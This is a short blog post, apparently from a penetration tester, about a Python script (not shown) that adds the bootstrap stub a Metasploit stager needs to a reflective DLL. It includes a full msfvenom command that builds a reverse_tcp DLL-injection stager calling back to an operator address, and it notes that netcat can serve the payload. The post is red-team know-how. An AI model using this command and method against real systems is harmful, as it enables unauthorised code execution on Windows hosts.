Here I share a tiny python script
to “patch” a reflective DLL with the bootstrap needed to be executed by the
respective stager. Its use is simple, just give it the DLL you want to
patch and the preferred exit method (thread by default).
I did this because I needed a faster way to patch DLLs instead of letting the msf handler did it for me. This way I don’t even have to call msfconsole.
The script looks for the ReflectiveLoader export function, calculate its raw offset and finally make up the stub. Then, the reflective DLL is build from the stub and the rest of the payload.
The script will also add the size of the
payload (look at the bytes highlighted in the previous image) at the
beginning of the reflective DLL which is necessary for some stagers to
know the number of bytes to allocate in the next stage. Generally, a
call to VirtualAlloc is done to reserve that memory. Note that those bytes should be removed if you are using a HTTP-based stager.
Let’s check it. I have compiled a silly reflective DLL to prompt a messagebox.
Next, I have created a dllinject/reverse_tcp stager as follows:
root@kali:/tmp# msfvenom -p windows/dllinject/reverse_tcp lhost=192.168.1.41 lport=9999 dll=. -f exe -o /media/sf_Share/reflective_tcp.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Saved as: /media/sf_Share/reflective_tcp.exe
Finally, I patch the payload with the tiny bootstrap shellcode and wait for the stager to pick it up on port 9999 (a simple netcat will do):
No comments:
Post a Comment